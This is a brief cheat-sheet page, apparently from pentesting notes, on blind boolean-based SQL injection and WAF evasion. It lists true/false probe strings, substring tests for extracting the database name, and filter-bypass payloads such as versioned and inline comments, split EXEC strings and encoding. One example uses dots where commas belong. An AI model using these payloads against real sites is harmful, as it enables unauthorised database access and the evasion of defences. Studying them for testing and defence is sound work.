Blind Boolean based SQL & Evasion Techniques

PreviousSQL injection NextSQL

Last updated 1 year ago

Blind Boolean based SQL

11' and 'N' = 'N TRUE
11' and 'N'= 'A False
substring('Ahmed'.1.1)='A' => True

select substring(database(),1,1)='d'

Evasion Techniques

WAF
- ' or 1-1 --+
  - or 2>1
  - 'or 'hacktor'>'a'
- '/*!12345order*/by 7#
- url encode,hex etc..
- EXEC('sele','ct')
- "UNION SELECT"
- '/**/or/**/1/**/=/**/1/**/
- Hackbar => Cyberfox